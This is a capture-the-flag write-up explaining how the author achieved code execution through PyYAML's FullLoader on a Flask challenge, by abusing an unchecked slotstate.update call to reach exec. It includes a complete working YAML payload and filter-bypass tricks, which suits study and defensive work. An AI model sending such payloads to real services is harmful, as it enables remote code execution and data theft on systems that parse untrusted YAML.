deserializeme

In this challenge, we're linked a website as well as its Flask backend. It consists of a single route that loads a YAML file we provide in the request body:

@app.route('/', methods=["POST"])
def pwnme():
    if not re.fullmatch(b"^[\n --/-\]a-}]*$", request.data, flags=re.MULTILINE):
        return "Nice try!", 400
    return yaml.load(request.data)

Before anything else, I verified that the endpoint worked as intended. My template for sending a YAML file and printing the response:

import requests

r = requests.post('https://deserializeme.chal.uiuc.tf/', data=open('payload.yaml').read())
print(r.text) # {"hello":"world","number":9}

Vulnerability

PyYAML is well known for unsafe deserialization, mainly because it supports all sorts of interaction with Python objects. I'll reference its documentation throughout the writeup.

However, there are two restrictions to keep in mind. First, yaml.load uses FullLoader by default in the PyYAML version running here, which bans the !!python/object/apply tag among other things. This means that we can't directly call arbitrary functions like eval, although we can still construct class instances with the !!python/object/new tag.

Second, this challenge uses a regex filter, which bans the following printable characters:

  • Periods
  • Carets
  • Underscores
  • Backticks
  • Tildes
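
One way to double-check which characters the filter rejects is to brute-force it. The sketch below tests every printable ASCII byte against the same pattern, written as a raw bytes literal so the escapes reach the regex engine unchanged. The variable names are my own.

```python
import re

# Same character class as the challenge's filter, as a raw bytes literal.
FILTER = re.compile(rb"^[\n --/-\]a-}]*$", flags=re.MULTILINE)

# Try each printable ASCII byte (0x20 through 0x7e) on its own.
rejected = [
    chr(code)
    for code in range(0x20, 0x7F)
    if not FILTER.fullmatch(bytes([code]))
]

print(rejected)  # ['.', '^', '_', '`', '~']
```

Of these, losing the period hurts the most.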

This prevents us from accessing objects from other modules, which are specified with the <module>.<name> format. Fortunately, PyYAML will use the builtins module by default if you don't supply a period. I'm not sure if this is in the documentation, but the source code proves it:

def find_python_name(self, name, mark, unsafe=False):
    if not name:
        raise ConstructorError("while constructing a Python object", mark,
                "expected non-empty name appended to the tag", mark)
    if '.' in name:
        module_name, object_name = name.rsplit('.', 1)
    else:
        module_name = 'builtins'
        object_name = name
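
To make the fallback concrete, here is a simplified stand-alone version of that lookup. It is a sketch rather than PyYAML's actual code: resolve_name is a hypothetical helper, and I use importlib where the library does its own import handling.

```python
import importlib


def resolve_name(name):
    """Resolve 'module.object' or a bare builtin name to a Python object."""
    if "." in name:
        module_name, object_name = name.rsplit(".", 1)
    else:
        # No period in the name: fall back to the builtins module.
        module_name, object_name = "builtins", name
    module = importlib.import_module(module_name)
    return getattr(module, object_name)


print(resolve_name("exec") is exec)        # True
print(resolve_name("Warning") is Warning)  # True
```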

To summarize, we can construct and reference built-in objects, but we can't call functions directly. Our goal is still to execute arbitrary code.

Exploit

This is the format for specifying class construction, as per the documentation:

!!python/object/new:module.Class
args: [argument, ...]
kwds: {key: value, ...}
state: ...
listitems: [item, ...]
dictitems: [key: value, ...]

Right away, I was interested in the state field. It turns out that PyYAML uses it to add arbitrary attributes to an object after it's constructed! This won't work for most built-in types, since their instances have no writable __dict__. Fortunately, some classes are writable: Warning, the Error types, etc. Hence the following creates an object where obj.hello == 'world':

!!python/object/new:Warning
state:
  hello: 'world'
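
In plain Python, the effect is roughly the following. This is a sketch of what the loader ends up doing for an object that has a __dict__, not the library's exact code path.

```python
# Build the instance without going through YAML.
obj = Warning.__new__(Warning)

# Applying the state mapping amounts to updating the instance's __dict__.
obj.__dict__.update({"hello": "world"})
print(obj.hello)  # world

# Most built-in types have no per-instance __dict__ to write into.
print(hasattr(obj, "__dict__"))  # True
print(hasattr("", "__dict__"))   # False
```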

Not every attribute can be set, however. PyYAML calls check_state_key on each key, which matches it against a blacklist regex. Keys of the form __something__ are banned, which makes some sense. Interestingly, the key extend is also banned. PyYAML justifies this in the source code:

extend is blacklisted because it is used by construct_python_object_apply to add listitems to a newly generate python instance
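
As a rough illustration of that check, the sketch below rejects the two kinds of key described above. The patterns and the is_blocked_key helper are my own approximation of the behavior, not a copy of PyYAML's code.

```python
import re

# Assumed patterns: the exact key 'extend' and any __dunder__ name.
BLOCKED = re.compile(r"^extend$|^__.*__$")


def is_blocked_key(key):
    """Return True if a state key would be refused."""
    return BLOCKED.match(key) is not None


print(is_blocked_key("hello"))      # False
print(is_blocked_key("extend"))     # True
print(is_blocked_key("__class__"))  # True
print(is_blocked_key("update"))     # False
```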

Let's look at the construct_python_object_apply method for clarification:

if state:
    self.set_python_instance_state(instance, state)
if listitems:
    instance.extend(listitems)
if dictitems:
    for key in dictitems:
        instance[key] = dictitems[key]
return instance

Notice that if there were no blacklist, this payload would give RCE:

!!python/object/new:Warning
state:
  extend: !!python/name:exec
listitems: 'whatever python code we want'

We first set extend to the built-in exec function, using the !!python/name tag. Since extend is now a plain instance attribute rather than a bound method, instance.extend(listitems) is just exec(listitems), and listitems is a code string! We've essentially created an object that 'spoofs' a list.
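
The spoofing idea works in plain Python too. The sketch below sets extend directly, which is exactly what the blacklist prevents through YAML, and then repeats the call PyYAML would make. The code string and the EXTEND_DEMO variable are harmless placeholders of mine.

```python
import os

fake_list = Warning.__new__(Warning)

# What the state field would do if 'extend' were not blacklisted.
fake_list.__dict__.update({"extend": exec})

# Harmless stand-in for attacker-controlled code.
listitems = "import os; os.environ['EXTEND_DEMO'] = 'ran'"

# Mirrors the loader's call: an instance attribute is called without self,
# so this is simply exec(listitems).
if listitems:
    fake_list.extend(listitems)

print(os.environ["EXTEND_DEMO"])  # ran
```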

In general, this kind of bug exists whenever code assumes the type of an object we provide and then calls one of its methods with an argument we also control. I spent a lot of time looking for this scenario in the Flask source code, but I ended up finding one in PyYAML - coincidentally, in the function which sets state. Here's the source:

def set_python_instance_state(self, instance, state, unsafe=False):
    if hasattr(instance, '__setstate__'):
        instance.__setstate__(state)
    else:
        slotstate = {}
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if hasattr(instance, '__dict__'):
            if not unsafe and state:
                for key in state.keys():
                    self.check_state_key(key)
            instance.__dict__.update(state)
        elif state:
            slotstate.update(state)
        for key, value in slotstate.items():
            if not unsafe:
                self.check_state_key(key)
            setattr(instance, key, value)

Notice that slotstate is assumed to be a dictionary. Yet if state is a tuple, the code destructures it into (state, slotstate). Since no other type checks are performed, we have full control over both objects! In particular, this lets us exploit slotstate.update(state).
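
The missing type check is easy to reproduce outside PyYAML. Below is a trimmed-down sketch of the same branching, with the key checks and the trailing setattr loop left out. set_state_sketch and Spy are hypothetical names of mine.

```python
class Spy:
    """Stand-in for an attacker-supplied object; records update() calls."""

    def __init__(self):
        self.calls = []

    def update(self, arg):
        self.calls.append(arg)


def set_state_sketch(instance, state):
    slotstate = {}
    if isinstance(state, tuple) and len(state) == 2:
        # Nothing verifies that the second element is a dict.
        state, slotstate = state
    if hasattr(instance, "__dict__"):
        instance.__dict__.update(state)
    elif state:
        slotstate.update(state)


# A str instance has no __dict__, so the elif branch runs.
spy = Spy()
set_state_sketch("", ("attacker-chosen argument", spy))
print(spy.calls)  # ['attacker-chosen argument']

# An instance with a __dict__ takes the first branch instead.
other = Spy()
set_state_sketch(Warning(), ({"a": 1}, other))
print(other.calls)  # []
```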

We want slotstate to be a dummy object whose update attribute points to exec. Hence state should be a tuple containing a code string and the dummy object, in that order. One final caveat: in order to reach the elif block, our outer class instance cannot have the __dict__ attribute - a read-only type like str works. Here's a payload which prints the flag:

!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
  state:
    update: !!python/name:exec
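
Before sending, it's worth confirming locally that the payload survives the filter. A small sketch, reusing the challenge's pattern; passes_filter is a helper name I made up.

```python
import re

FILTER = re.compile(rb"^[\n --/-\]a-}]*$", flags=re.MULTILINE)


def passes_filter(body):
    """Return True if the request body would get past the regex check."""
    return FILTER.fullmatch(body) is not None


# Raw bytes so the backslash in \x2e is kept literally, as in the YAML file.
payload = rb"""!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
  state:
    update: !!python/name:exec
"""

print(passes_filter(payload))                          # True
print(passes_filter(payload.replace(rb"\x2e", b".")))  # False
```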

A few more notes:

  • Since periods are banned, I escaped the one in the filename as \x2e. Note that YAML doesn't process this escape (single-quoted YAML strings keep backslashes literally); Python decodes it when exec parses the string literal.
  • In order to access object attributes and methods without periods, I used getattr.
  • The easiest way to exfiltrate from the server is to make an HTTP request containing the flag. This is left as an exercise to the reader.
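
The first two notes can be checked in isolation. In this sketch I pass an explicit namespace to exec so the result can be inspected; the temporary directory and the file contents are placeholders.

```python
import os
import tempfile

# Period-free source: \x2e stays a literal backslash sequence until
# Python parses the inner string literal during exec.
source = r'content = getattr(open(directory + "/flag\x2etxt"), "read")()'
print("." in source)  # False

with tempfile.TemporaryDirectory() as directory:
    with open(os.path.join(directory, "flag.txt"), "w") as handle:
        handle.write("demo{not-the-real-flag}")

    namespace = {"directory": directory}
    exec(source, namespace)

print(namespace["content"])  # demo{not-the-real-flag}
```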